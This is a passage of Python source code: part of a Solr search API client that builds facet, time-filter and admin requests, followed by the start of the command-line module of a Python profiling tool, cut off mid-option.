{'coeff': '+7', 'unit': 'MINUTES'}, 'bar-widget': {'coeff': '+7', 'unit': 'MINUTES'}, 'facet-widget': {'coeff': '+1', 'unit': 'HOURS'}, }, '1DAYS': { 'histogram-widget': {'coeff': '+15', 'unit': 'MINUTES'}, 'bucket-widget': {'coeff': '+15', 'unit': 'MINUTES'}, 'bar-widget': {'coeff': '+15', 'unit': 'MINUTES'}, 'facet-widget': {'coeff': '+3', 'unit': 'HOURS'}, }, '2DAYS': { 'histogram-widget': {'coeff': '+30', 'unit': 'MINUTES'}, 'bucket-widget': {'coeff': '+30', 'unit': 'MINUTES'}, 'bar-widget': {'coeff': '+30', 'unit': 'MINUTES'}, 'facet-widget': {'coeff': '+6', 'unit': 'HOURS'}, }, '7DAYS': { 'histogram-widget': {'coeff': '+3', 'unit': 'HOURS'}, 'bucket-widget': {'coeff': '+3', 'unit': 'HOURS'}, 'bar-widget': {'coeff': '+3', 'unit': 'HOURS'}, 'facet-widget': {'coeff': '+1', 'unit': 'DAYS'}, }, '1MONTHS': { 'histogram-widget': {'coeff': '+12', 'unit': 'HOURS'}, 'bucket-widget': {'coeff': '+12', 'unit': 'HOURS'}, 'bar-widget': {'coeff': '+12', 'unit': 'HOURS'}, 'facet-widget': {'coeff': '+5', 'unit': 'DAYS'}, }, '3MONTHS': { 'histogram-widget': {'coeff': '+1', 'unit': 'DAYS'}, 'bucket-widget': {'coeff': '+1', 'unit': 'DAYS'}, 'bar-widget': {'coeff': '+1', 'unit': 'DAYS'}, 'facet-widget': {'coeff': '+30', 'unit': 'DAYS'}, }, '1YEARS': { 'histogram-widget': {'coeff': '+3', 'unit': 'DAYS'}, 'bucket-widget': {'coeff': '+3', 'unit': 'DAYS'}, 'bar-widget': {'coeff': '+3', 'unit': 'DAYS'}, 'facet-widget': {'coeff': '+12', 'unit': 'MONTHS'}, }, '2YEARS': { 'histogram-widget': {'coeff': '+7', 'unit': 'DAYS'}, 'bucket-widget': {'coeff': '+7', 'unit': 'DAYS'}, 'bar-widget': {'coeff': '+7', 'unit': 'DAYS'}, 'facet-widget': {'coeff': '+3', 'unit': 'MONTHS'}, }, '10YEARS': { 'histogram-widget': {'coeff': '+1', 'unit': 'MONTHS'}, 'bucket-widget': {'coeff': '+1', 'unit': 'MONTHS'}, 'bar-widget': {'coeff': '+1', 'unit': 'MONTHS'}, 'facet-widget': {'coeff': '+1', 'unit': 'YEARS'}, } } time_field = collection['timeFilter'].get('field') if time_field and 
(collection['timeFilter']['value'] != 'all' or collection['timeFilter']['type'] == 'fixed'): # fqs overrides main time filter fq_time_ids = [fq['id'] for fq in query['fqs'] if fq['field'] == time_field] props['time_filter_overrides'] = fq_time_ids props['time_field'] = time_field if collection['timeFilter']['type'] == 'rolling': props['field'] = collection['timeFilter']['field'] props['from'] = 'NOW-%s' % collection['timeFilter']['value'] props['to'] = 'NOW' props['gap'] = GAPS.get(collection['timeFilter']['value']) elif collection['timeFilter']['type'] == 'fixed': props['field'] = collection['timeFilter']['field'] props['from'] = collection['timeFilter']['from'] props['to'] = collection['timeFilter']['to'] props['fixed'] = True return props def _get_time_filter_query(self, timeFilter, facet): if 'fixed' in timeFilter: props = {} stat_facet = {'min': timeFilter['from'], 'max': timeFilter['to']} _compute_range_facet(facet['widgetType'], stat_facet, props, stat_facet['min'], stat_facet['max']) gap = props['gap'] unit = re.split('\d+', gap)[1] return { 'start': '%(from)s/%(unit)s' % {'from': timeFilter['from'], 'unit': unit}, 'end': '%(to)s/%(unit)s' % {'to': timeFilter['to'], 'unit': unit}, 'gap': '%(gap)s' % props, # add a 'auto' } else: gap = timeFilter['gap'][facet['widgetType']] return { 'start': '%(from)s/%(unit)s' % {'from': timeFilter['from'], 'unit': gap['unit']}, 'end': '%(to)s/%(unit)s' % {'to': timeFilter['to'], 'unit': gap['unit']}, 'gap': '%(coeff)s%(unit)s/%(unit)s' % gap, # add a 'auto' } def _get_fq(self, collection, query): params = () timeFilter = {} if collection: timeFilter = self._get_range_borders(collection, query) if timeFilter and not timeFilter.get('time_filter_overrides'): params += (('fq', urllib.unquote(utf_quoter('%(field)s:[%(from)s TO %(to)s]' % timeFilter))),) # Merge facets queries on same fields grouped_fqs = groupby(query['fqs'], lambda x: (x['type'], x['field'])) merged_fqs = [] for key, group in grouped_fqs: field_fq = next(group) for fq in group: for f in fq['filter']: field_fq['filter'].append(f) merged_fqs.append(field_fq) for fq in merged_fqs: if fq['type'] == 'field': fields = fq['field'] if type(fq['field']) == list else [fq['field']] # 2D facets support for field in fields: f = [] for _filter in fq['filter']: values = _filter['value'] if type(_filter['value']) == list else [_filter['value']] # 2D facets support if fields.index(field) < len(values): # Lowest common field denominator value = values[fields.index(field)] exclude = '-' if _filter['exclude'] else '' if value is not None and ' ' in force_unicode(value): value = force_unicode(value).replace('"', '\\"') f.append('%s%s:"%s"' % (exclude, field, value)) else: f.append('%s{!field f=%s}%s' % (exclude, field, value)) _params ='{!tag=%(id)s}' % fq + ' '.join(f) params += (('fq', urllib.unquote(utf_quoter(_params))),) elif fq['type'] == 'range': params += (('fq', '{!tag=%(id)s}' % fq + ' '.join([urllib.unquote( utf_quoter('%s%s:[%s TO %s}' % ('-' if field['exclude'] else '', fq['field'], f['from'], f['to']))) for field, f in zip(fq['filter'], fq['properties'])])),) elif fq['type'] == 'range-up': params += (('fq', '{!tag=%(id)s}' % fq + ' '.join([urllib.unquote( utf_quoter('%s%s:[%s TO %s}' % ('-' if field['exclude'] else '', fq['field'], f['from'] if fq['is_up'] else '*', '*' if fq['is_up'] else f['from']))) for field, f in zip(fq['filter'], fq['properties'])])),) elif fq['type'] == 'map': _keys = fq.copy() _keys.update(fq['properties']) params += (('fq', '{!tag=%(id)s}' % fq + urllib.unquote( 
utf_quoter('%(lat)s:[%(lat_sw)s TO %(lat_ne)s} AND %(lon)s:[%(lon_sw)s TO %(lon_ne)s}' % _keys))),) return params def query(self, collection, query): solr_query = {} solr_query['collection'] = collection['name'] if query.get('download'): solr_query['rows'] = 1000 solr_query['start'] = 0 else: solr_query['rows'] = int(collection['template']['rows'] or 10) solr_query['start'] = int(query['start']) solr_query['rows'] = min(solr_query['rows'], 1000) solr_query['start'] = min(solr_query['start'], 10000) params = self._get_params() + ( ('q', self._get_q(query)), ('wt', 'json'), ('rows', solr_query['rows']), ('start', solr_query['start']), ) if any(collection['facets']): params += ( ('facet', 'true'), ('facet.mincount', 0), ('facet.limit', 10), ) json_facets = {} timeFilter = self._get_range_borders(collection, query) for facet in collection['facets']: if facet['type'] == 'query': params += (('facet.query', '%s' % facet['field']),) elif facet['type'] == 'range' or facet['type'] == 'range-up': keys = { 'id': '%(id)s' % facet, 'field': facet['field'], 'key': '%(field)s-%(id)s' % facet, 'start': facet['properties']['start'], 'end': facet['properties']['end'], 'gap': facet['properties']['gap'], 'mincount': int(facet['properties']['mincount']) } if timeFilter and timeFilter['time_field'] == facet['field'] and (facet['id'] not in timeFilter['time_filter_overrides'] or facet['widgetType'] != 'histogram-widget'): keys.update(self._get_time_filter_query(timeFilter, facet)) params += ( ('facet.range', '{!key=%(key)s ex=%(id)s f.%(field)s.facet.range.start=%(start)s f.%(field)s.facet.range.end=%(end)s f.%(field)s.facet.range.gap=%(gap)s f.%(field)s.facet.mincount=%(mincount)s}%(field)s' % keys), ) elif facet['type'] == 'field': keys = { 'id': '%(id)s' % facet, 'field': facet['field'], 'key': '%(field)s-%(id)s' % facet, 'limit': int(facet['properties'].get('limit', 10)) + (1 if facet['widgetType'] == 'facet-widget' else 0), 'mincount': int(facet['properties']['mincount']) } params += ( ('facet.field', '{!key=%(key)s ex=%(id)s f.%(field)s.facet.limit=%(limit)s f.%(field)s.facet.mincount=%(mincount)s}%(field)s' % keys), ) elif facet['type'] == 'nested': _f = { 'field': facet['field'], 'limit': int(facet['properties'].get('limit', 10)) + (1 if facet['widgetType'] == 'facet-widget' else 0), 'mincount': int(facet['properties']['mincount']) } if 'start' in facet['properties']: _f.update({ 'type': 'range', 'start': facet['properties']['start'], 'end': facet['properties']['end'], 'gap': facet['properties']['gap'], }) if timeFilter and timeFilter['time_field'] == facet['field'] and (facet['id'] not in timeFilter['time_filter_overrides'] or facet['widgetType'] != 'bucket-widget'): _f.update(self._get_time_filter_query(timeFilter, facet)) else: _f.update({ 'type': 'terms', 'field': facet['field'], 'excludeTags': facet['id'] }) if facet['properties']['facets']: if facet['properties']['facets'][0]['aggregate'] == 'count': _f['facet'] = { 'd2': { 'type': 'terms', 'field': '%(field)s' % facet['properties']['facets'][0], 'limit': int(facet['properties']['facets'][0].get('limit', 10)), 'mincount': int(facet['properties']['facets'][0]['mincount']) } } if len(facet['properties']['facets']) > 1: # Get 3rd dimension calculation _f['facet']['d2']['facet'] = { 'd2': self._get_aggregate_function(facet['properties']['facets'][1]) } else: _f['facet'] = { 'd2': self._get_aggregate_function(facet['properties']['facets'][0]) } json_facets[facet['id']] = _f elif facet['type'] == 'function': json_facets[facet['id']] = 
self._get_aggregate_function(facet) json_facets['processEmpty'] = True elif facet['type'] == 'pivot': if facet['properties']['facets'] or facet['widgetType'] == 'map-widget': fields = facet['field'] fields_limits = [] for f in facet['properties']['facets']: fields_limits.append('f.%s.facet.limit=%s' % (f['field'], f['limit'])) fields_limits.append('f.%s.facet.mincount=%s' % (f['field'], f['mincount'])) fields += ',' + f['field'] keys = { 'id': '%(id)s' % facet, 'key': '%(field)s-%(id)s' % facet, 'field': facet['field'], 'fields': fields, 'limit': int(facet['properties'].get('limit', 10)), 'mincount': int(facet['properties']['mincount']), 'fields_limits': ' '.join(fields_limits) } params += ( ('facet.pivot', '{!key=%(key)s ex=%(id)s f.%(field)s.facet.limit=%(limit)s f.%(field)s.facet.mincount=%(mincount)s %(fields_limits)s}%(fields)s' % keys), ) if json_facets: params += ( ('json.facet', json.dumps(json_facets)), ) params += self._get_fq(collection, query) if collection['template']['fieldsSelected'] and collection['template']['isGridLayout']: fields = set(collection['template']['fieldsSelected'] + [collection['idField']] if collection['idField'] else []) # Add field if needed if collection['template']['leafletmap'].get('latitudeField'): fields.add(collection['template']['leafletmap']['latitudeField']) if collection['template']['leafletmap'].get('longitudeField'): fields.add(collection['template']['leafletmap']['longitudeField']) if collection['template']['leafletmap'].get('labelField'): fields.add(collection['template']['leafletmap']['labelField']) params += (('fl', urllib.unquote(utf_quoter(','.join(list(fields))))),) else: params += (('fl', '*'),) params += ( ('hl', 'true'), ('hl.fl', '*'), ('hl.snippets', 5), ('hl.fragsize', 1000), ) if collection['template']['fieldsSelected']: fields = [] for field in collection['template']['fieldsSelected']: attribute_field = filter(lambda attribute: field == attribute['name'], collection['template']['fieldsAttributes']) if attribute_field: if attribute_field[0]['sort']['direction']: fields.append('%s %s' % (field, attribute_field[0]['sort']['direction'])) if fields: params += ( ('sort', ','.join(fields)), ) response = self._root.get('%(collection)s/select' % solr_query, params) return self._get_json(response) def suggest(self, collection, query): try: params = self._get_params() + ( ('suggest', 'true'), ('suggest.build', 'true'), ('suggest.q', query['q']), ('wt', 'json'), ) if query.get('dictionary'): params += ( ('suggest.dictionary', query['dictionary']), ) response = self._root.get('%s/suggest' % collection, params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def collections(self): # To drop, used in indexer v1 try: params = self._get_params() + ( ('detail', 'true'), ('path', '/clusterstate.json'), ) response = self._root.get('zookeeper', params=params) return json.loads(response['znode'].get('data', '{}')) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def collections2(self): try: params = self._get_params() + ( ('action', 'LIST'), ('wt', 'json'), ) return self._root.get('admin/collections', params=params)['collections'] except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def configs(self): try: params = self._get_params() + ( ('action', 'LIST'), ('wt', 'json'), ) return self._root.get('admin/configs', params=params)['configSets'] except RestException, e: raise PopupException(e, title=_('Error 
while accessing Solr')) def aliases(self): try: params = self._get_params() + ( # Waiting for SOLR-4968 ('detail', 'true'), ('path', '/aliases.json'), ) response = self._root.get('zookeeper', params=params) return json.loads(response['znode'].get('data', '{}')).get('collection', {}) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def collection_or_core(self, hue_collection): if hue_collection.is_core_only: return self.core(hue_collection.name) else: return self.collection(hue_collection.name) def collection(self, name): try: collections = self.collections() return collections[name] except Exception, e: raise PopupException(e, title=_('Error while accessing Solr')) def create_collection(self, name, shards=1, replication=1): try: params = self._get_params() + ( ('action', 'CREATE'), ('name', name), ('numShards', shards), ('replicationFactor', replication), ('collection.configName', name), ('wt', 'json') ) response = self._root.post('admin/collections', params=params, contenttype='application/json') if 'success' in response: return True else: LOG.error("Could not create collection. Check response:\n%s" % json.dumps(response, indent=2)) return False except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def create_core(self, name, instance_dir, shards=1, replication=1): try: params = self._get_params() + ( ('action', 'CREATE'), ('name', name), ('instanceDir', instance_dir), ('wt', 'json'), ) response = self._root.post('admin/cores', params=params, contenttype='application/json') if response.get('responseHeader', {}).get('status', -1) == 0: return True else: LOG.error("Could not create core. Check response:\n%s" % json.dumps(response, indent=2)) return False except RestException, e: if 'already exists' in e.message: LOG.warn("Could not create collection.", exc_info=True) return False else: raise PopupException(e, title=_('Error while accessing Solr')) def create_or_modify_alias(self, name, collections): try: params = self._get_params() + ( ('action', 'CREATEALIAS'), ('name', name), ('collections', ','.join(collections)), ('wt', 'json'), ) response = self._root.post('admin/collections', params=params, contenttype='application/json') if response.get('responseHeader', {}).get('status', -1) != 0: msg = _("Could not create or edit alias. Check response:\n%s") % json.dumps(response, indent=2) LOG.error(msg) raise PopupException(msg) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def delete_alias(self, name): try: params = self._get_params() + ( ('action', 'DELETEALIAS'), ('name', name), ('wt', 'json'), ) response = self._root.post('admin/collections', params=params, contenttype='application/json') if response.get('responseHeader', {}).get('status', -1) != 0: msg = _("Could not delete alias. Check response:\n%s") % json.dumps(response, indent=2) LOG.error(msg) raise PopupException(msg) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def remove_collection(self, name, replication=1): try: params = self._get_params() + ( ('action', 'DELETE'), ('name', name), ('replicationFactor', replication), ('wt', 'json') ) response = self._root.post('admin/collections', params=params, contenttype='application/json') if 'success' in response: return True else: LOG.error("Could not remove collection. 
Check response:\n%s" % json.dumps(response, indent=2)) return False except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def remove_core(self, name): try: params = self._get_params() + ( ('action', 'UNLOAD'), ('name', name), ('deleteIndex', 'true'), ('wt', 'json') ) response = self._root.post('admin/cores', params=params, contenttype='application/json') if 'success' in response: return True else: LOG.error("Could not remove core. Check response:\n%s" % json.dumps(response, indent=2)) return False except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def add_fields(self, collection, fields): try: params = self._get_params() return self._root.post('%s/schema/fields' % collection, params=params, data=json.dumps(fields), contenttype='application/json') except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def cores(self): try: params = self._get_params() + ( ('wt', 'json'), ) return self._root.get('admin/cores', params=params)['status'] except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def core(self, core): try: params = self._get_params() + ( ('wt', 'json'), ('core', core), ) return self._root.get('admin/cores', params=params) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def schema(self, core): try: params = self._get_params() + ( ('wt', 'json'), ('file', 'schema.xml'), ) return self._root.get('%(core)s/admin/file' % {'core': core}, params=params) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def fields(self, core, dynamic=False): try: params = self._get_params() + ( ('wt', 'json'), ('fl', '*'), ) if not dynamic: params += (('show', 'schema'),) response = self._root.get('%(core)s/admin/luke' % {'core': core}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def luke(self, core): try: params = self._get_params() + ( ('wt', 'json'), ) response = self._root.get('%(core)s/admin/luke' % {'core': core}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def schema_fields(self, core): try: params = self._get_params() + ( ('wt', 'json'), ) response = self._root.get('%(core)s/schema/fields' % {'core': core}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def stats(self, core, fields, query=None, facet=''): try: params = self._get_params() + ( ('q', self._get_q(query) if query is not None else EMPTY_QUERY.get()), ('wt', 'json'), ('rows', 0), ('stats', 'true'), ) if query is not None: params += self._get_fq(None, query) if facet: params += (('stats.facet', facet),) params += tuple([('stats.field', field) for field in fields]) response = self._root.get('%(core)s/select' % {'core': core}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def terms(self, core, field, properties=None): try: params = self._get_params() + ( ('wt', 'json'), ('rows', 0), ('terms.fl', field), ) if properties: for key, val in properties.iteritems(): params += ((key, val),) response = self._root.get('%(core)s/terms' % {'core': core}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def 
sql(self, collection, statement): try: if 'limit' not in statement.lower(): # rows is not supported statement = statement + ' LIMIT 100' params = self._get_params() + ( ('wt', 'json'), ('rows', 0), ('stmt', statement), ('rows', 100), ('start', 0), ) response = self._root.get('%(collection)s/sql' % {'collection': collection}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def get(self, core, doc_id): try: params = self._get_params() + ( ('id', doc_id), ('wt', 'json'), ) response = self._root.get('%(core)s/get' % {'core': core}, params=params) return self._get_json(response) except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) @classmethod def _get_json(cls, response): if type(response) != dict: # Got 'plain/text' mimetype instead of 'application/json' try: response = json.loads(response) except ValueError, e: # Got some null bytes in the response LOG.error('%s: %s' % (unicode(e), repr(response))) response = json.loads(response.replace('\x00', '')) return response def uniquekey(self, collection): try: params = self._get_params() + ( ('wt', 'json'), ) response = self._root.get('%s/schema/uniquekey' % collection, params=params) return self._get_json(response)['uniqueKey'] except RestException, e: raise PopupException(e, title=_('Error while accessing Solr')) def update(self, collection_or_core_name, data, content_type='csv', version=None): try: if content_type == 'csv': content_type = 'application/csv' elif content_type == 'json': content_type = 'application/json' else: LOG.error("Could not update index for %s. Unsupported content type %s. Allowed content types: csv" % (collection_or_core_name, content_type)) return False params = self._get_params() + ( ('wt', 'json'), ('overwrite', 'true'), ) if version is not None: params += ( ('_version_', version), ('versions', 'true') ) self._root.post('%s/update' % collection_or_core_name, contenttype=content_type, params=params, data=data) return True except RestException, e: raise PopupException(e, title=_('Error while accessing Solr'))
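# Most of the query construction above is string templating around a small lookup
# table: _get_range_borders picks a GAPS entry for the rolling time filter and
# _get_time_filter_query turns it into Solr date-math start/end/gap values. Below is a
# standalone sketch of that translation with a one-entry excerpt of the table; the
# field and widget names are just examples.
#
#     # Excerpt of the GAPS table: bucket width per rolling window and widget type.
#     ROLLING_GAPS = {
#         '7DAYS': {
#             'histogram-widget': {'coeff': '+3', 'unit': 'HOURS'},
#             'facet-widget': {'coeff': '+1', 'unit': 'DAYS'},
#         },
#     }
#
#     def rolling_range_facet(field, window, widget_type):
#         gap = ROLLING_GAPS[window][widget_type]
#         return {
#             'field': field,
#             'start': 'NOW-%s/%s' % (window, gap['unit']),    # e.g. NOW-7DAYS/HOURS
#             'end': 'NOW/%s' % gap['unit'],                   # e.g. NOW/HOURS
#             'gap': '%(coeff)s%(unit)s/%(unit)s' % gap,       # e.g. +3HOURS/HOURS
#         }
#
#     print(rolling_range_facet('event_time_dt', '7DAYS', 'histogram-widget'))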
# -*- coding: utf-8 -*- """ profiling.__main__ ~~~~~~~~~~~~~~~~~~ The command-line interface to profile a script or view profiling results. .. sourcecode:: console $ profiling --help :copyright: (c) 2014-2017, What! Studio :license: BSD, see LICENSE for more details. """ from __future__ import absolute_import from datetime import datetime from functools import partial, wraps import importlib import os try: import cPickle as pickle except ImportError: import pickle import runpy import signal import socket from stat import S_ISREG, S_ISSOCK import sys import threading import time import traceback import click from click_default_group import DefaultGroup from six import exec_ from six.moves import builtins from six.moves.configparser import ConfigParser, NoOptionError, NoSectionError from profiling import remote, sampling, tracing from profiling.__about__ import __version__ from profiling.profiler import Profiler from profiling.remote.background import BackgroundProfiler from profiling.remote.client import FailoverProfilingClient, ProfilingClient from profiling.remote.select import SelectProfilingServer from profiling.sampling import samplers, SamplingProfiler from profiling.tracing import timers, TracingProfiler from profiling.viewer import bind_game_keys, bind_vim_keys, StatisticsViewer __all__ = ['cli', 'profile', 'view'] DEFAULT_ENDPOINT = '127.0.0.1:8912' class ProfilingCLI(DefaultGroup): def __init__(self, *args, **kwargs): super(ProfilingCLI, self).__init__(*args, **kwargs) self.command_name_aliases = {} def command(self, *args, **kwargs): """Usage:: @cli.command(aliases=['ci']) def commit(): ... """ aliases = kwargs.pop('aliases', None) decorator = super(ProfilingCLI, self).command(*args, **kwargs) if aliases is None: return decorator def _decorator(f): cmd = decorator(f) for alias in aliases: self.command_name_aliases[alias] = cmd.name return cmd return _decorator def get_command(self, ctx, cmd_name): # Resolve alias. try: cmd_name = self.command_name_aliases[cmd_name] except KeyError: pass return super(ProfilingCLI, self).get_command(ctx, cmd_name) @click.command('profiling', cls=ProfilingCLI, default='profile') @click.version_option(__version__) def cli(): sys.path.insert(0, os.curdir) bind_vim_keys() bind_game_keys() class read_config(object): """Reads a config once in a Click context.""" filenames = ['setup.cfg', '.profiling'] ctx_and_config = (None, None) def __new__(cls): ctx, config = cls.ctx_and_config current_ctx = click.get_current_context(silent=True) if current_ctx != ctx: config = ConfigParser() config.read(cls.filenames) cls.ctx_and_config = (current_ctx, config) return config def option_getter(type): """Gets an unbound method to get a configuration option as the given type. """ option_getters = {None: ConfigParser.get, int: ConfigParser.getint, float: ConfigParser.getfloat, bool: ConfigParser.getboolean} return option_getters.get(type, option_getters[None]) def config_default(option, default=None, type=None, section=cli.name): """Guesses a default value of a CLI option from the configuration. :: @click.option('--locale', default=config_default('locale')) """ def f(option=option, default=default, type=type, section=section): config = read_config() if type is None and default is not None: # detect type from default. 
type = builtins.type(default) get_option = option_getter(type) try: return get_option(config, section, option) except (NoOptionError, NoSectionError): return default return f def config_flag(option, value, default=False, section=cli.name): """Guesses whether a CLI flag should be turned on or off from the configuration. If the configuration option value is same with the given value, it returns ``True``. :: @click.option('--ko-kr', 'locale', is_flag=True, default=config_flag('locale', 'ko_KR')) """ class x(object): def __bool__(self, option=option, value=value, default=default, section=section): config = read_config() type = builtins.type(value) get_option = option_getter(type) try: return get_option(config, section, option) == value except (NoOptionError, NoSectionError): return default __nonzero__ = __bool__ return x() def get_title(src_name, src_type=None): """Normalizes a source name as a string to be used for viewer's title.""" if src_type == 'tcp': return '{0}:{1}'.format(*src_name) return os.path.basename(src_name) def make_viewer(mono=False, *loop_args, **loop_kwargs): """Makes a :class:`profiling.viewer.StatisticsViewer` with common options. """ viewer = StatisticsViewer() loop = viewer.loop(*loop_args, **loop_kwargs) if mono: loop.screen.set_terminal_properties(1) return (viewer, loop) def spawn_thread(func, *args, **kwargs): """Spawns a daemon thread.""" thread = threading.Thread(target=func, args=args, kwargs=kwargs) thread.daemon = True thread.start() return thread def spawn(mode, func, *args, **kwargs): """Spawns a thread-like object which runs the given function concurrently. Available modes: - `threading` - `greenlet` - `eventlet` """ if mode is None: # 'threading' is the default mode. mode = 'threading' elif mode not in spawn.modes: # validate the given mode. raise ValueError('Invalid spawn mode: %s' % mode) if mode == 'threading': return spawn_thread(func, *args, **kwargs) elif mode == 'gevent': import gevent import gevent.monkey gevent.monkey.patch_select() gevent.monkey.patch_socket() return gevent.spawn(func, *args, **kwargs) elif mode == 'eventlet': import eventlet eventlet.patcher.monkey_patch(select=True, socket=True) return eventlet.spawn(func, *args, **kwargs) assert False spawn.modes = ['threading', 'gevent', 'eventlet'] #: Just returns the first argument. noop = lambda x: x def import_(module_name, name): """Imports an object by a relative module path:: Profiler = import_('profiling.profiler', 'Profiler') """ module = importlib.import_module(module_name, __package__) return getattr(module, name) #: Makes a function which import an object by :func:`import_` lazily. 
importer = lambda module_name, name: partial(import_, module_name, name) # custom parameter types class Class(click.ParamType): def __init__(self, modules, base, base_name=None, postfix=True): self.modules = modules self.base = base self.base_name = base_name self.postfix = postfix def convert(self, value, param, ctx): if value == self.base_name: return self.base name = value.title() if self.postfix: name += self.base.__name__.title() for mod in self.modules: try: cls = getattr(mod, name) except AttributeError: continue if not isinstance(cls, type): continue elif not issubclass(cls, self.base): continue return cls self.fail('%s not found' % name) def get_metavar(self, param): return self.base.__name__.upper() class Script(click.File): """A parameter type for Python script.""" def __init__(self): super(Script, self).__init__('rb') def convert(self, value, param, ctx): with super(Script, self).convert(value, param, ctx) as f: filename = f.name code = compile(f.read(), filename, 'exec') globals_ = {'__file__': filename, '__name__': '__main__', '__package__': None, '__doc__': None} return (filename, code, globals_) def get_metavar(self, param): return 'PYTHON' class Module(click.ParamType): def convert(self, value, param, ctx): # inspired by @htch's fork. # https://github.com/htch/profiling/commit/4a4eb6e try: detail = runpy._get_module_details(value) except ImportError as exc: ctx.fail(str(exc)) try: # since Python 3.4. mod_name, mod_spec, code = detail except ValueError: mod_name, loader, code, filename = detail else: loader = mod_spec.loader filename = mod_spec.origin # follow runpy's behavior. pkg_name = mod_name.rpartition('.')[0] globals_ = sys.modules['__main__'].__dict__.copy() globals_.update(__name__='__main__', __file__=filename, __loader__=loader, __package__=pkg_name) return (filename, code, globals_) def get_metavar(self, param): return 'PYTHON-MODULE' class Command(click.ParamType): def convert(self, value, param, ctx): filename = '<string>' code = compile(value, filename, 'exec') globals_ = {'__name__': '__main__', '__package__': None, '__doc__': None} return (filename, code, globals_) def get_metavar(self, param): return 'PYTHON-COMMAND' class Endpoint(click.ParamType): """A parameter type for IP endpoint.""" def convert(self, value, param, ctx): host, port = value.split(':') port = int(port) return (host, port) def get_metavar(self, param): return 'HOST:PORT' class ViewerSource(click.ParamType): """A parameter type for :class:`profiling.viewer.StatisticsViewer` source. 
""" def convert(self, value, param, ctx): src_type = False try: mode = os.stat(value).st_mode except OSError: try: src_name = Endpoint().convert(value, param, ctx) except ValueError: pass else: src_type = 'tcp' else: src_name = value if S_ISSOCK(mode): src_type = 'sock' elif S_ISREG(mode): src_type = 'dump' if not src_type: raise ValueError('Dump file or socket address required.') return (src_type, src_name) def get_metavar(self, param): return 'SOURCE' class SignalNumber(click.ParamType): """A parameter type for signal number.""" @staticmethod def name_of(signum): for name, value in signal.__dict__.items(): if signum == value: if name.startswith('SIG') and not name.startswith('SIG_'): return name return str(signum) def convert(self, value, param, ctx): if isinstance(value, int): return value elif value.isdigit(): return int(value) signame = value.upper() if not signame.startswith('SIG'): signame = 'SIG' + signame if signame.startswith('SIG_'): self.fail('Invalid signal %s' % signame) try: signum = getattr(signal, signame) except AttributeError: self.fail('Unknown signal %s' % signame) return signum def get_metavar(self, param): return 'SIGNUM' # common parameters class Params(object): def __init__(self, params): self.params = params def __call__(self, f): for param in self.params[::-1]: f = param(f) return f def __add__(self, params): return self.__class__(self.params + params) def profiler_options(f): # tracing profiler options @click.option( '-T', '--tracing', 'import_profiler_class', flag_value=importer('profiling.tracing', 'TracingProfiler'), default=config_flag('profiler', 'tracing', True), help='Use tracing profiler. (default)') @click.option( '--timer', 'timer_class', type=Class([timers], timers.Timer, 'basic'), default=config_default('timer', 'basic'), help='Choose CPU timer for tracing profiler. (basic|thread|greenlet)') # sampling profiler options @click.option( '-S', '--sampling', 'import_profiler_class', flag_value=importer('profiling.sampling', 'SamplingProfiler'), default=config_flag('profiler', 'sampling', False), help='Use sampling profiler.') @click.option( '--sampler', 'sampler_class', type=Class([samplers], samplers.Sampler), default=config_default('sampler', 'itimer'), help='Choose frames sampler for sampling profiler. (itimer|tracing)') @click.option( '--sampling-interval', type=float, default=config_default('sampling-interval', samplers.INTERVAL), help='How often sample. (default: %.3f cpu sec)' % samplers.INTERVAL) # etc @click.option( '--pickle-protocol', type=int, default=config_default('pickle-protocol', remote.PICKLE_PROTOCOL), help='Pickle protocol to dump result.') @wraps(f) def wrapped(import_profiler_class, timer_class, sampler_class, sampling_interval, **kwargs): profiler_class = import_profiler_class() assert issubclass(profiler_class, Profiler) if issubclass(profiler_class, TracingProfiler): # profiler requires timer. 
timer_class = timer_class or tracing.TIMER_CLASS timer = timer_class() profiler_kwargs = {'timer': timer} elif issubclass(profiler_class, SamplingProfiler): sampler_class = sampler_class or sampling.SAMPLER_CLASS sampler = sampler_class(sampling_interval) profiler_kwargs = {'sampler': sampler} else: profiler_kwargs = {} profiler_factory = partial(profiler_class, **profiler_kwargs) return f(profiler_factory=profiler_factory, **kwargs) return wrapped def profiler_arguments(f): @click.argument('argv', nargs=-1) @click.option('-m', 'module', type=Module(), help='Run library module as a script.') @click.option('-c', 'command', type=Command(), help='Program passed in as string.') @wraps(f) def wrapped(argv, module, command, **kwargs): if module is not None and command is not None: raise click.UsageError('Option -m and -c are exclusive') script = module or command if script is None: # -m and -c not passed. try: script_filename, argv = argv[0], argv[1:] except IndexError: raise click.UsageError('Script not specified') script = Script().convert(script_filename, None, None) kwargs.update(script=script, argv=argv) return f(**kwargs) return wrapped viewer_options = Params([ click.option('--mono', is_flag=True, help='Disable coloring.'), ]) onetime_profiler_options = Params([ click.option( '-d', '--dump', 'dump_filename', type=click.Path(writable=True), help='Profiling result dump filename.'), ]) live_profiler_options = Params([ click.option( '-i', '--interval', type=float, default=config_default('interval', remote.INTERVAL), help='How often update result. (default: %.0f sec)' % remote.INTERVAL), click.option( '--spawn', type=click.Choice(spawn.modes), default=config_default('spawn'), callback=lambda c, p, v: partial(spawn, v), help='How to spawn profiler server in background.'), click.option( '--signum', type=SignalNumber(), default=config_default('signum', BackgroundProfiler.signum), help=( 'For 